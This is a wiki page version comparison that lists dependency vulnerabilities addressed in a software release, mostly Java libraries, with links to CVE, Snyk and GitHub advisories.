Versions Compared

Old Version 2

changes.mady.by.user Dave Trier

Saved on

compared with

New Version Current

changes.mady.by.user Dave Trier

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Expand
titleVulnerabilities Addressed

Vulnerability: FasterXML, jackson-bind

*Issue Link:* [https://access.redhat.com/security/cve/CVE-2022-42003|https://access.redhat.com/security/cve/CVE-2022-42003|smart-link]

Addressed Vulnerability: HTTP Response Splitting when calling `DefaultHttpHeaders` on an iterator of values, because header value validation is not performed.

*Issue Link:*

[https://security.snyk.io/vuln/SNYK-JAVA-IONETTY-3167773|https://security.snyk.io/vuln/SNYK-JAVA-IONETTY-3167773|smart-link]

Addressed Vulnerability: RHEL-8 - A flaw was found in the org.yaml.snakeyaml package

*Issue Link:* [https://access.redhat.com/security/cve/CVE-2022-25857|https://access.redhat.com/security/cve/CVE-2022-25857|smart-link]

Addressed Vulnerability: DoS org.yaml:snakeyaml

*Issue Link:*  [https://security.snyk.io/vuln/SNYK-JAVA-ORGYAML-2806360|https://security.snyk.io/vuln/SNYK-JAVA-ORGYAML-2806360|smart-link]

[https://github.com/advisories/GHSA-3mc7-4q67-w48m|https://github.com/advisories/GHSA-3mc7-4q67-w48m|smart-link]

Addressed Vulnerability: Invalid HTTP requests in Reactor Netty HTTP Server may reveal access tokens

*Issue Link:*

[https://github.com/advisories/GHSA-7w4x-4h67-pgmv|https://github.com/advisories/GHSA-7w4x-4h67-pgmv|smart-link]

Addressed Vulnerability: com.squareup.okhttp3:okhttp vulnerable to Information Exposure

*Issue Link:*

[https://security.snyk.io/vuln/SNYK-JAVA-COMSQUAREUPOKHTTP3-2958044|https://security.snyk.io/vuln/SNYK-JAVA-COMSQUAREUPOKHTTP3-2958044|smart-link]

Addressed Vulnerability: Denial of Service by injecting highly recursive collections or maps in XStream

Issues links:

1-  [https://github.com/advisories/GHSA-rmr5-cpv2-vgjf|https://github.com/advisories/GHSA-rmr5-cpv2-vgjf|smart-link]

2- [https://security.snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-2388977|https://security.snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-2388977|smart-link]

3- [https://access.redhat.com/security/cve/CVE-2022-40151|https://access.redhat.com/security/cve/CVE-2022-40151|smart-link]

Addressed Vulnerability: Apache Commons Beanutils 1.9.2

*Issue Link:* [https://github.com/advisories/GHSA-6phf-73q6-gh87|https://github.com/advisories/GHSA-6phf-73q6-gh87|smart-link]

Addressed Vulnerability: Denial of Service by stack overflow in the `map` parameter.

*Issue link:*

1- [https://security.snyk.io/vuln/SNYK-JAVA-ORGCODEHAUSJETTISON-3168084|https://security.snyk.io/vuln/SNYK-JAVA-ORGCODEHAUSJETTISON-3168084|smart-link]

2- [https://access.redhat.com/security/cve/CVE-2022-40149|https://access.redhat.com/security/cve/CVE-2022-40149|smart-link]

Addressed Vulnerability: org.codehaus.jettison:jettison

*Issue Link:* [https://access.redhat.com/security/cve/CVE-2022-40150|https://access.redhat.com/security/cve/CVE-2022-40150|smart-link]

Addressed Vulnerability: Cross-site scripting vulnerability in swagger-ui 3.26.2

Additional information: [https://www.tenable.com/plugins/was/113267|https://www.tenable.com/plugins/was/113267|smart-link]

Addressed Vulnerability: SNYK-JAVA-COMFASTERXMLWOODSTOX-2928754

Source: [https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLWOODSTOX-2928754|https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLWOODSTOX-2928754|smart-link

Addressed Vulnerability: On com.google.code.gson-gson

Additional details here: [https://access.redhat.com/security/cve/CVE-2022-25647|https://access.redhat.com/security/cve/CVE-2022-25647|smart-link

Vulnerabilities: Apache Xalan Java XSLT library- GHSA-9339-86wc-4qgf [poi-ooxml] - CVE-2022-34169

Additional Info: [https://github.com/advisories/GHSA-9339-86wc-4qgf|https://github.com/advisories/GHSA-9339-86wc-4qgf|smart-link

Addressed Vulnerability: Document-Service - SNYK-JAVA-XALAN-2953385 - [poi-ooxml]

[xalan:xalan|http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xalan%22] is a XSLT processor for transforming XML documents into HTML, text, or other XML document types

Addressed Vulnerability: In FasterXML jackson-databind before 2.13.4, resource exhaustion can occur because of a lack of a check, related to the same CVE-2022-42003

Vulnerability: Parsing a XML document with the XML_PARSE_HUGE option enabled can result in an integer overflow.

Additional Info:  [https://access.redhat.com/security/cve/CVE-2022-40303|https://access.redhat.com/security/cve/CVE-2022-40303|smart-link

Addressed Vulnerability:  [Git]-  Integer overflow can result in arbitrary heap writes, which may allow arbitrary code execution.

CVE’s:

Addressed Vulnerability: <[https://nvd.nist.gov/vuln/detail/CVE-2016-3086|https://nvd.nist.gov/vuln/detail/CVE-2016-3086|smart-link] > - Critical - The YARN NodeManager in Apache Hadoop 2.6.x before 2.6.5 and 2.7.x before 2.7.3 can leak the password for credential store provider used by the NodeManager to YARN Applications.
<[https://nvd.nist.gov/vuln/detail/CVE-2021-37404|https://nvd.nist.gov/vuln/detail/CVE-2021-37404|smart-link] > - Critical - There is a potential heap buffer overflow in Apache Hadoop lib hdfs native code. Opening a file path provided by user without validation may result in a denial of service or arbitrary code execution. Users should upgrade to Apache Hadoop 2.10.2, 3.2.3, 3.3.2 or higher.

Addressed Vulnerability: |[CVE-2017-1000190|https://us-east-2.console.aws.amazon.com/inspector/v2/home?region=us-east-2#/findings?by=all&findingArn=arn:aws:inspector2:us-east-2:685917037183:finding/1081782d6faf01e0f61cf1fe918a77ab]|org.simpleframework:simple-xml|CRITICAL|SimpleXML (latest version 2.7.1) is vulnerable to an XXE vulnerability resulting SSRF, information disclosure, DoS and so on.

Addressed Vulnerability: Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed
Additional details here:
[https://github.com/advisories/GHSA-hfrx-6qgj-fp6c|https://github.com/advisories/GHSA-hfrx-6qgj-fp6c|smart-link

Addressed Vulnerability: Upgrade org.apache.poi ; org.apache.poi.poi-ooxml and org.apache.poi.poi-scratchpad from 5.0.0 

Addressed Vulnerability: org.apache.santuario:xmlsec - [poi-ooxml] - GHSA-j8wc-gxx9-82hx - CVE-2021-40690

Additional info: [https://access.redhat.com/security/cve/CVE-2021-40690|https://access.redhat.com/security/cve/CVE-2021-40690|smart-link

Vulnerability :  org.apache.xmlgraphics:xmlgraphics-commons - [poi-ooxml] - GHSA-fmj2-7wx8-qj4v CVE-2020-11988

More info: [https://github.com/advisories/GHSA-fmj2-7wx8-qj4v|https://github.com/advisories/GHSA-fmj2-7wx8-qj4v|smart-link

Addressed Vulnerability: org.apache.xmlgraphics:batik-svgbrowser - [poi-ooxml] - SNYK-JAVA-ORGAPACHEXMLGRAPHICS-1074910  - CVE-2022-41704

Additional info: [https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHEXMLGRAPHICS-1074910|https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHEXMLGRAPHICS-1074910]

Addressed Vulnerability: org.apache.xmlgraphics:batik - [poi-ooxml] - https://access.redhat.com/security/cve/CVE-2022-40146 - CVE-2022-40146  - CVE-2020-11987 - GHSA-2h63-qp69-fwvw - CVE-2022-42890

Additional info here: [https://access.redhat.com/security/cve/CVE-2022-40146|https://access.redhat.com/security/cve/CVE-2022-40146|smart-link

Vulnerability: Upgrade org.apache.pdfbox:pdfbox to version 2.0.23 or higher - [poi-ooxml] - SNYK-JAVA-ORGAPACHEPDFBOX-1088012 - SNYK-JAVA-ORGAPACHEPDFBOX-1088011 - SNYK-JAVA-ORGAPACHEPDFBOX-1304912 - SNYK-JAVA-ORGAPACHEPDFBOX-1304913

Additional Info: [org.apache.pdfbox:pdfbox|http://pdfbox.apache.org/] is an open source Java tool for working with PDF documents. Affected versions of this package are vulnerable to Denial of Service (DoS)

Addressed Vulnerability: Upgrade org.apache.xmlgraphics:batik-bridge to version 1.15 or higher - [poi-ooxml] - SNYK-JAVA-ORGAPACHEXMLGRAPHICS-3031729 - SNYK-JAVA-ORGAPACHEXMLGRAPHICS-3031730 - CVE-2022-40152

Additional info:

Addressed Remove dependency `Apache Commons JXPath package` with identified vulnerability

Additional Info: [https://access.redhat.com/security/cve/CVE-2022-41852|https://access.redhat.com/security/cve/CVE-2022-41852|smart-link]: A flaw was found in the Apache Commons JXPath package. This flaw allows an attacker to use the interpreter to execute untrusted expressions and a remote code attack{quote}

Addressed Vulnerability: Cross-site scripting at api level. Reflected Cross-site Scripting (XSS) is another name for non-persistent or Type-II XSS, in which the attack doesn't load with the vulnerable web application but is instead originated by the victim loading the offending URI.